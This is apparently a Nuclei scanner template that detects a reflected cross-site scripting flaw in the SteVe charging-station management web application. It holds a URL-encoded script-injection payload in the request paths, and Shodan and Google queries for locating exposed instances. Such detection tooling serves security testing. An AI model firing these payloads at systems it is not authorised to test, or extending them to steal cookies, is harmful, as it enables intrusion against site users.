id: steve-xss

info:
  name: SteVe - Cross-Site Scripting
  author: clem9669
  severity: medium
  description: |
    SteVe contains a cross-site scripting vulnerability. An attacker can inject arbitrary script in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks.
  reference:
    - https://github.com/steve-community/steve
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N
    cvss-score: 5.4
    cwe-id: CWE-80
  metadata:
    verified: true
    max-request: 2
    shodan-query: http.title:"SteVe - Steckdosenverwaltung"
    google-query: intitle:"SteVe - Steckdosenverwaltung"
  tags: steve,xss,oss

http:
  - method: GET
    path:
      - '{{BaseURL}}/steve/services/"%3E%3Cscript%3Ealert(document.domain)%3C/script%3E/services/'
      - '{{BaseURL}}/services/"%3E%3Cscript%3Ealert(document.domain)%3C/script%3E/services/'

    stop-at-first-match: true

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - '<script>alert(document.domain)</script>/services/?stylesheet=1">'

      - type: word
        part: header
        words:
          - "text/html"

      - type: status
        status:
          - 200

# digest: 4b0a00483046022100bd054625f98079524776d1eb77377fe0d5011b6e9714def7172733a74c789678022100a96c7e308c1242394521b3e72abb40a0435fbd0e7ea18f4836cdc5ac871dca6d:922c64590222798bb761d5b6d8e72950
